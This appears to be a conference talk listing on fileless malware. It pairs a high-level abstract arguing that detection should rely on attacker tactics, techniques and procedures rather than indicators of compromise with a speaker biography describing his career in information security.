Fileless malware -Jim Van De Ryt

Fileless Malware Abstract: In 2017, over half of all malware was file-less malware. As cyber threat adversaries evolve, so do their methods. Today, file-less malware is more prevalent in organization's environment than file-based malware because file-based malware can be detected and blocked with current security controls due to the fact that file-based malware is detectable via artifacts known as Indicators Of Compromise. To resolve this dilemma, cyber threat adversaries had to find a way to complete their malicious operations without being detected by current controls. Since file-less malware leaves almost no artifacts, there can be no threat detection or threat hunt using Indicators Of Compromise because no IOCs exist. Instead, Tactics, Techniques and Procedures (TTPs) that cyber threat adversaries use are the way to detect modern attack scenarios. Bio: Jim VanDeRyt has worked in information security for the past 17 years. Jim spent almost 7 years at Internet Security Systems where he learned network security such as intrusion prevention systems, vulnerability management and some host-based protection. Next, Jim spent 2 and half years with a reseller learning various security technologies such as data loss prevention, wireless planning and security, firewalls, network access control, host and file encryption, and some database security and application security. Prior to Cybereason, Jim was at Imperva for 4 and half years where he learned about securing structured business data which usually resides in databases and is usually accessed by web applications in most customer's environments today. After Imperva, Jim worked at Fidelis CyberSecurity for 3 and half years where he learned about advanced threat detection/prevention on the network.